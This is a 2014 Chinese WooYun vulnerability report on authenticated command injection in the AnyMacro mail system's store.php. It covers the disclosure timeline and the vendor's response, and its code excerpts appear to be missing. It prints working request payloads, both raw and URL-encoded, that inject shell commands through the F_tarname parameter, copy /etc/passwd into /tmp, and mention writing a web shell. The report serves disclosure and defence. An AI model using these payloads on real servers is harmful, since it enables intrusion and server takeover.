漏洞概要
关注数(8)
关注此漏洞
漏洞标题: Anymacro 邮件系统多处远程命令注入漏洞(需要登陆)
提交时间: 2014-05-17 23:56
公开时间: 2014-08-15 23:58
漏洞类型: 命令执行
危害等级: 高
自评Rank: 20
漏洞状态:
厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-05-17: 细节已通知厂商并且等待厂商处理中
2014-05-18: 厂商已经确认,细节仅向厂商公开
2014-05-21: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-07-12: 细节向核心白帽子及相关领域专家公开
2014-07-22: 细节向普通白帽子公开
2014-08-01: 细节向实习白帽子公开
2014-08-15: 细节向公众公开
简要描述:
详细说明:
乌云已经把它列入到通用型奖励厂商当中了。
0x01 背景
AnyMacro(安宁)成立于1999年,是国内领先的统一消息/移动门户/PushMail产品与应用解决方案提供商。主要客户涵盖国家部委、大型企业以及部分海外客户,客户分布于政府、军工、金融、电信、能源、教育等行业。 AnyMacro在技术创新和关键应用中一直处于行业领先地位,在全球首家提出并实现LAMP架构邮件/消息系统已成为事实的行业标准。AnyMacro 具有统一消息/移动门户/PushMail领域的全线技术与自主知识产权,还是多家国际Linux厂商的OEM邮件/消息产品提供商。
0x02 漏洞分析:
由于该邮件系统多处由于调用system()函数,并且由于未做充分考虑。。导致攻击者可以绕过限制,将构造好的命令字符串直接达到命令执行(可写shell,可执行系统命令,可控制整个服务器)。
具体分析如下:
在根目录下store.php中
其中
接下来分析
0x03 exploit分析
Exploit构造,前面我们可知$_REQUEST['F_tarname'] 可控,(但是需要注意的是前面空格做了限制)
我们可以构造如下攻击包。。。
store.php?F_sid=9ead95a11698fb7a1302dbbc6d730ad1&F_down=1&F_tarname=fuck.tar" /etc/passwd |echo 13111 > /tmp/test.txt||"
但是前面我们提过,不能要空格,有什么方法绕过呢?。。。。
其实+可以替代我们的空格的,顾我们可以绕过,直接执行系统命令了。。如
fuck.tar"+/etc/passwd+|cat+/etc/passwd+>+/tmp/test.txt||"
然后urlencode一下
/store.php?F_sid=9ead95a11698fb7a1302dbbc6d730ad1&F_down=1&F_tarname=fuck.tar%22%2B%2Fetc%2Fpasswd%2B%7Ccat%2B%2Fetc%2Fpasswd%2B%3E%2B%2Ftmp%2Ftest.txt%7C%7C%22&F_type=tgz&F_file[]=
即可将passwd 写到/tmp/目录下test.txt中
然后写shell了
其中在simple/store.php同样存在该问题
漏洞证明:
然后写shell了
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-05-18 13:24
厂商回复:
此版本为我公司G6版本,现在使用比较少。已经推出升级包,联系用户升级处理
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(少于3人评价):
评价